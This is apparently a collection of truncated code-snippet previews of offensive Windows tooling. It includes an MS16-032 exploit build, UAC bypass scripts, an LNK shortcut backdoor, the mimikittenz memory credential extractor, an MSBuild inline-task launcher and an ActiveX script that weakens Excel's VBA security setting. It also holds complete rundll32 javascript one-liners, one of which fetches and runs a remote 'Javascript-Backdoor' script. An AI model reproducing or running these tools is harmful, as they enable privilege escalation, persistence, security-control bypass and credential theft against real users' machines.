Ridter

<html>
	<head>
		<script>
			var objExcel = new ActiveXObject("Excel.Application");
			objExcel.Visible = false;
			var WshShell = new ActiveXObject("WScript.Shell");
			var Application_Version = objExcel.Version;//Auto-Detect Version
			var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
			WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
			var objWorkbook = objExcel.Workbooks.Add();

Ridter

/*
Author: Evilcg, Twitter: @Evilcg
Step One:
PS C:\> [psobject].Assembly.Location
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /out:MS16_032.exe MS16_032.cs

Windows 10 reference may be Here: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35

Ridter

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;

namespace Export
{
    class Test
    {

Ridter

function Invoke-WScriptBypassUAC
{
    <#
    .SYNOPSIS

    Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.

    Author: @enigma0x3, @harmj0y, Vozzie
    License: BSD 3-Clause
    Required Dependencies: None

Ridter

function Set-LNKBackdoor {
<#
    .SYNOPSIS
    
        Backdoors an existing .LNK shortcut to trigger the original binary and a payload specified by
        -ScriptBlock or -Command.

        Author: @harmj0y
        License: BSD 3-Clause
        Required Dependencies: None

Ridter

rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")

Ridter

function Invoke-UACBypass {
<#
.SYNOPSIS

Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.

Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

Ridter

function Invoke-mimikittenz
{
<#
.SYNOPSIS

Extracts juicy info from memory.
	
Author: Jamieson O'Reilly (https://au.linkedin.com/in/jamieson-o-reilly-13ab6470)
License: https://creativecommons.org/licenses/by/4.0/

Ridter

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes c# code. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
  <Target Name="Hello">
    <SharpLauncher >
    </SharpLauncher>
  </Target>
  <UsingTask
    TaskName="SharpLauncher"
    TaskFactory="CodeTaskFactory"

Ridter

using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;

public class Test
{